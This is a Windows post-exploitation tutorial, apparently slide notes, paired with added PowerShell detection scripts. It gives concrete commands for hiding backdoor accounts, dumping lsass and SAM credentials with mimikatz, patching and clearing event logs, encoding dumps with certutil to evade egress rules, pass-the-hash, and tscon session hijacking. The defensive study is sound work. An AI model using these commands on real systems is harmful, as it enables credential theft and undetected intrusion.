Windows Post Exploitation
Privilege Escalation

Covering Tracks

Unlike Linux systems, on Windows not all processes are given their own dedicated user accounts. As a result, a new, unfamiliar user account is much more easily noticed by system administrators.

Net user: after creating a "backdoor" user on a Windows machine, it is recommended to perform some extra steps to hide this user from user-listing tools.

Logon screen: even after hiding the user from listing tools, it will still appear on the logon screen and must be dealt with manually to ensure it goes undetected.

Net User

net user is a built-in Windows tool that lists or manipulates user accounts. However, it does not list special accounts: accounts whose name ends with '$'.

A '$' can be appended to an existing user's name with
  wmic useraccount where name='[username]' call rename name='[username]$'
Alternatively, a new user can be created with a '$' at the end of its name.

Logon Screen

Hiding special accounts from the logon screen is a built-in Windows feature, although it is not configured by default. It is configured by adding two new registry keys and a DWORD value under
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
• SpecialAccounts
• UserList
• [special account username] - a DWORD value with data '0'
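
A defender's check for the two hiding tricks on this and the previous slide, added here as an example and not part of the deck. It assumes a local (non-domain-controller) host with the Microsoft.PowerShell.LocalAccounts module, run from an elevated prompt:

```powershell
# Audit a host for accounts hidden from 'net user' ('$' suffix) and from the logon
# screen (Winlogon\SpecialAccounts\UserList value = 0). Added example; run elevated.
$userListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

function Get-HiddenAccountFindings {
    $findings = @()

    # 1. Local accounts whose name ends in '$' are skipped by 'net user'.
    #    Get-LocalUser (LocalAccounts module) still lists them.
    foreach ($u in Get-LocalUser) {
        if ($u.Name.EndsWith('$')) {
            $findings += [pscustomobject]@{
                Account   = $u.Name
                Finding   = 'name ends in $ (not shown by net user)'
                Enabled   = $u.Enabled
                LastLogon = $u.LastLogon
            }
        }
    }

    # 2. Any value under SpecialAccounts\UserList with data 0 hides that account
    #    from the logon screen. The key does not exist on a default install, so its
    #    mere presence is worth a look.
    if (Test-Path $userListKey) {
        $props = Get-ItemProperty -Path $userListKey
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath/... metadata
            $local = Get-LocalUser -Name $p.Name -ErrorAction SilentlyContinue
            $state = if ($p.Value -eq 0) { 'hidden from logon screen (UserList = 0)' } else { "listed in UserList with data $($p.Value)" }
            $findings += [pscustomobject]@{
                Account   = $p.Name
                Finding   = $state
                Enabled   = if ($local) { $local.Enabled } else { 'no such local account' }
                LastLogon = if ($local) { $local.LastLogon } else { $null }
            }
        }
    }
    return $findings
}

$results = @(Get-HiddenAccountFindings)
if ($results.Count -eq 0) {
    Write-Host 'No hidden-account indicators found.'
} else {
    $results | Format-Table -AutoSize
    Write-Host "`nTo show an account on the logon screen again, delete its UserList value:"
    Write-Host "  Remove-ItemProperty -Path '$userListKey' -Name '<account>'"
}
```

A '$'-suffixed name is normal for domain computer accounts but not for local user accounts, which is why the first check treats any hit as a finding.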

The Next Step

Post Exploitation

Post-exploitation techniques are used to gain persistence on the system and to move further along the attack chain. Although the local system has been taken, there is still the matter of going from local administrator to domain administrator. To do so, more data about the users on the system is needed.

Below are useful targets for information gathering:

TARGET     DESCRIPTION
SAM        A database file on Windows that stores users' (hashed) passwords and is used to authenticate local and remote users.
ntds.dit   In a domain environment, Active Directory uses the ntds.dit database instead of the SAM for authentication.
lsass.exe  The Windows process responsible for authenticating users logging on. It also writes to the Windows Security log.

Lsass – SAM Relation

Authentication Process

The authentication process in Windows is done solely over NTLM exchanges, in which no plain-text password is transmitted. Lsass queries the SAM to check whether a user with a given hashed name and hashed password exists. On successful authentication, the user's privileges are downgraded and the user is logged in.

LSASS -> SAM: does user 'D7963BCBBA37514E9235E3DFDBDF8558' with password hash '3DBDE697D71690A769204BEB12283678' exist?
SAM -> LSASS: Yes / No

The memory of all authentication processes and logons on the system contains the users' credentials. Once accessed, these hashes can be cracked in the case of weak passwords, or used for Pass-the-Hash in the case of strong passwords.

Cracking Hashes

Cracking weak passwords can be done with either online services or dedicated programs.

'Hashkiller' is an online service which may provide better and faster results due to its larger databases and calculation speed.

'Cain & Abel' is a dedicated program which also supports loading hashes directly from a SAM database.

Mimikatz

Mimikatz is an open-source post-exploitation tool with various modules allowing hash extraction, system patching, and more. Using mimikatz requires administrator privileges.

Read from memory: with mimikatz it is possible to elevate privileges to NT AUTHORITY\SYSTEM; one may then access lsass, which runs as SYSTEM, and read its memory using the sekurlsa module.

Patch Windows: mimikatz can also be useful when covering tracks and clearing logs, thanks to its event-patching module.

Read dump: mimikatz supports reading and analyzing memory dumps of lsass, which makes it possible to analyze the data on a remote system.

Token Impersonation

The following commands can be used in mimikatz to elevate to NT AUTHORITY\SYSTEM privileges:
• privilege::debug – enables the debug privilege
• log [filename] – logs mimikatz's output to a file for better readability
• token::elevate – elevates the current privileges for dumping lsass
• token::whoami – verifies that the privileges were indeed elevated

Dumping lsass

Using mimikatz to dump the content of the SAM database can be done with the following commands:
• lsadump::sam – dumps the content of the SAM database
• sekurlsa::logonpasswords full – extracts the NTLM hashes and tokens of logged-on users from lsass memory

The sekurlsa module provides much more functionality; it is documented on mimikatz's GitHub page.

Clearing Logs

An important step in post-exploitation is covering tracks. Deleting logs is a critical part of this, although it may be troublesome: clearing a log deletes all existing entries but produces a new "log cleared" entry. Although that entry provides no direct information, the deletion itself is suspicious.

Patching Event Viewer

Using mimikatz, it is possible to patch the event log service in a way that allows deleting all logs without leaving a trace:
• event::drop – patches the event log service so that no new log entries are created
• event::clear – clears all entries from the event log
It is important to run the commands in this specific order.
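
A defender's view of the two slides above, as an added example that is not from the deck: a cleared log always leaves a "log cleared" record, and patched-out logging shows up as a Security log that goes quiet while the host is up. It assumes an elevated PowerShell prompt; the lookback and silence thresholds are arbitrary choices.

```powershell
# Hunt for event-log tampering: (1) "log cleared" records, which clearing leaves behind,
# and (2) a Security log that stopped receiving events while the host is up, which is
# what patched-out logging looks like. Added example; run elevated.
param(
    [int]$LookbackHours  = 24,
    [int]$SilenceMinutes = 30
)

function Get-LogClearedEvents([datetime]$Since) {
    # Security 1102 = "The audit log was cleared"; System 104 = "The <log> log file was cleared".
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $Since },
        @{ LogName = 'System';   Id = 104;  StartTime = $Since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Log     = $_.LogName
                Id      = $_.Id
                Summary = ([string]$_.Message -split "`r?`n")[0]   # first line names the cleared log
            }
        }
    }
}

function Test-SecurityLogSilence([int]$Minutes) {
    # A live host keeps producing Security events (logons, privilege use, policy
    # changes); a long gap ending now means nothing is being written.
    $newest = Get-WinEvent -LogName 'Security' -MaxEvents 1 -ErrorAction SilentlyContinue
    if (-not $newest) { return 'Security log is empty or unreadable' }
    $quiet  = (Get-Date) - $newest.TimeCreated
    $uptime = (Get-Date) - (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
    if ($quiet.TotalMinutes -gt $Minutes) {
        return ('no Security events for {0:N0} min (host up for {1:N0} min)' -f $quiet.TotalMinutes, $uptime.TotalMinutes)
    }
    return $null
}

$since   = (Get-Date).AddHours(-$LookbackHours)
$cleared = @(Get-LogClearedEvents -Since $since)
if ($cleared.Count) {
    Write-Warning "$($cleared.Count) log-cleared record(s) in the last $LookbackHours h:"
    $cleared | Format-Table -AutoSize
}
$silence = Test-SecurityLogSilence -Minutes $SilenceMinutes
if ($silence) { Write-Warning "Possible logging suppression: $silence" }

# Stopping the Windows Event Log service is the crude version of the same outcome.
$svc = Get-Service -Name EventLog
if ($svc.Status -ne 'Running') { Write-Warning "Windows Event Log service is $($svc.Status)" }

if (-not $cleared.Count -and -not $silence -and $svc.Status -eq 'Running') {
    Write-Host 'No log-tampering indicators found.'
}
```

Forwarding events to a collector as they are written is the durable answer to both techniques, since neither clearing nor patching the local service removes records that have already left the host.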

Endpoint Protection

When attempting to use mimikatz on an AV-protected system, it will most likely be detected quickly because of mimikatz's popularity. Disabling the AV may be a complication as well, since it raises suspicion.

One solution is to extract the lsass dump manually and examine it on a different station.

Manual Dumping

Dumping lsass can be achieved via a completely legitimate Windows feature: in Task Manager, right-clicking the lsass process offers the option to dump it to a '.DMP' file in '%temp%'.

Exporting the Dump

On the not-so-rare occasion that the system enforces outbound rules on files, getting the lsass dump out might not be a straightforward task.

A great option to bypass this "protection" is to use more built-in tools such as certutil, which makes it easy to encode and decode files. Running certutil -encode [input file] [output file] produces a base64-encoded file that will most likely bypass any outbound rules.
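
A hunt for the artifacts of the last two slides, added as an example and not part of the deck: a Task Manager dump is a minidump file (it starts with the signature 'MDMP') in a user's %temp%, and certutil -encode wraps whatever it encodes in '-----BEGIN CERTIFICATE-----' lines, so a "certificate" whose payload decodes to a minidump is a staged credential dump. It assumes an elevated prompt; the 7-day window is arbitrary.

```powershell
# Look in every user's Temp folder for minidumps, raw or base64-wrapped by certutil.
# Added example; run elevated so other users' profiles are readable.
param([int]$Days = 7)

$minidumpMagic = [byte[]](0x4D, 0x44, 0x4D, 0x50)   # "MDMP", first 4 bytes of a minidump
$certHeader    = '-----BEGIN CERTIFICATE-----'       # first line of certutil -encode output

function Test-MinidumpBytes([byte[]]$Bytes) {
    if ($Bytes.Length -lt 4) { return $false }
    for ($i = 0; $i -lt 4; $i++) { if ($Bytes[$i] -ne $minidumpMagic[$i]) { return $false } }
    return $true
}

function Read-FileHead([string]$Path, [int]$Count) {
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $buf = New-Object byte[] $Count
        $n = $fs.Read($buf, 0, $Count)
        if ($n -le 0) { return [byte[]]@() }
        return [byte[]]($buf[0..($n - 1)])
    } finally { $fs.Dispose() }
}

function Get-DumpKind([System.IO.FileInfo]$File) {
    $head = Read-FileHead $File.FullName 64
    if (Test-MinidumpBytes $head) { return 'minidump' }
    if ([System.Text.Encoding]::ASCII.GetString($head).StartsWith($certHeader)) {
        # certutil writes the header line, then 64-character base64 lines; decoding the
        # first data line (48 bytes) is enough to see the wrapped file's signature.
        $dataLine = @(Get-Content -Path $File.FullName -TotalCount 2)[1]
        try {
            if ($dataLine -and (Test-MinidumpBytes ([Convert]::FromBase64String($dataLine)))) {
                return 'minidump wrapped by certutil -encode'
            }
        } catch { }   # not valid base64: a genuine certificate file or something else
    }
    return $null
}

function Find-StagedDumps([int]$Days) {
    $since = (Get-Date).AddDays(-$Days)
    $tempDirs = @($env:TEMP) + @(Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Local\Temp' })
    foreach ($dir in ($tempDirs | Where-Object { Test-Path $_ } | Select-Object -Unique)) {
        Get-ChildItem -Path $dir -File -Recurse -ErrorAction SilentlyContinue |
            Where-Object { $_.LastWriteTime -ge $since -and $_.Length -ge 64 } |
            ForEach-Object {
                try { $kind = Get-DumpKind $_ } catch { $kind = $null }   # locked or unreadable file
                if ($kind) {
                    [pscustomobject]@{ Path = $_.FullName; SizeMB = [math]::Round($_.Length / 1MB, 1)
                                       Modified = $_.LastWriteTime; Kind = $kind }
                }
            }
    }
}

$hits = @(Find-StagedDumps -Days $Days)
if ($hits.Count) { $hits | Format-Table -AutoSize }
else { Write-Host "No minidumps found in Temp folders modified in the last $Days days." }
```

The check keys on file content rather than the '.DMP' extension, so renaming the dump does not hide it; any minidump in a Temp folder deserves a look, not only one of lsass.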

User Password Hashes

In the following scenario, we are an administrator on the local system but not in the domain. Trying to communicate or authenticate with the server results in login failures and permission errors.

Luckily, the domain administrator seems to have connected to our station at some point, most likely over RDP, and his password hash was extracted with mimikatz.

Bypassing Authentication

The impersonation is possible due to a logical design flaw: the system is supposed to be more secure because no plain-text password is passed, yet at the same time this allows an attacker to authenticate without actually knowing the password.

Pass the Hash: because Windows authentication is done without plain-text passwords, cracking the hashes is not required; the hash itself can be used to authenticate.

Mimikatz: mimikatz allows a user to perform pass-the-hash (PTH) or golden ticket (GT) attacks with its sekurlsa and kerberos modules. By spawning a new shell that authenticates with the appropriate ticket or hash, the user remains relatively hidden.

Pass the Ticket: this works the same way as PTH but for Kerberos authentication; this attack is also known as the "golden ticket attack".

PTH

Passing the hash with mimikatz is done with the command
  sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[ntlm hash] /run:cmd
As seen in the example, from the newly spawned shell we can both authenticate with the server and execute commands.

PsExec

The PsExec tool was designed to allow execution of programs on remote systems, and it is useful when dealing with privilege escalation. The command
  PsExec.exe \\[IP] -u [pcname\username] -p [password] [program]
executes the program on the remote system.

The tool also packs some more features, such as running a program as NT AUTHORITY\SYSTEM using the '-s' flag:
  PsExec.exe -s -i [program]

Session Hijacking

With NT AUTHORITY\SYSTEM privileges we can now do even more than before, including switching to a different user's session. Running
  tscon [id] /dest:[current session name]
immediately hijacks the other user's session.

The same can be achieved by creating a service with
  sc create [service name] binpath= "cmd.exe /k tscon [id] /dest:[current session name]"
and starting it with
  net start [service name]
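
Both the service-based tscon trick above and PsExec leave a "service was installed" record (System event 7045). The following hunting script is an added example, not part of the deck; it assumes an elevated prompt, and the PSEXESVC service name and the 7045 field names come from Windows, not from the slides.

```powershell
# Hunt System 7045 ("A service was installed in the system") for the two patterns on
# these slides: PsExec's PSEXESVC service and a service whose binary path runs tscon
# (or any interactive cmd/powershell command line). Added example; run elevated.
param([int]$LookbackDays = 7)

function Get-ServiceInstallEvents([datetime]$Since) {
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Read the named EventData fields from the event XML instead of guessing
            # Properties[] indexes.
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                ServiceName = $data['ServiceName']
                ImagePath   = $data['ImagePath']
                StartType   = $data['StartType']
                Account     = $data['AccountName']
            }
        }
}

function Test-SuspiciousService($Event) {
    $path = [string]$Event.ImagePath
    if ($Event.ServiceName -eq 'PSEXESVC') { return 'PsExec remote execution service' }
    if ($path -match '(?i)\btscon(\.exe)?\b') { return 'service binary runs tscon (session hijack)' }
    if ($path -match '(?i)\b(cmd|powershell)(\.exe)?\b.*\s/[ck]\s') { return 'service binary is a cmd/powershell one-liner' }
    return $null
}

$events  = @(Get-ServiceInstallEvents -Since (Get-Date).AddDays(-$LookbackDays))
$flagged = foreach ($e in $events) {
    $why = Test-SuspiciousService $e
    if ($why) { $e | Add-Member -NotePropertyName Reason -NotePropertyValue $why -PassThru }
}

if ($flagged) { $flagged | Format-Table Time, ServiceName, Reason, ImagePath -AutoSize }
else { Write-Host "No suspicious service installs among $($events.Count) 7045 event(s) in the last $LookbackDays days." }
```

The tscon switch itself is also visible as a session reconnect in the Security log, so a 7045 hit is best confirmed against the logon/session events around the same minute.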
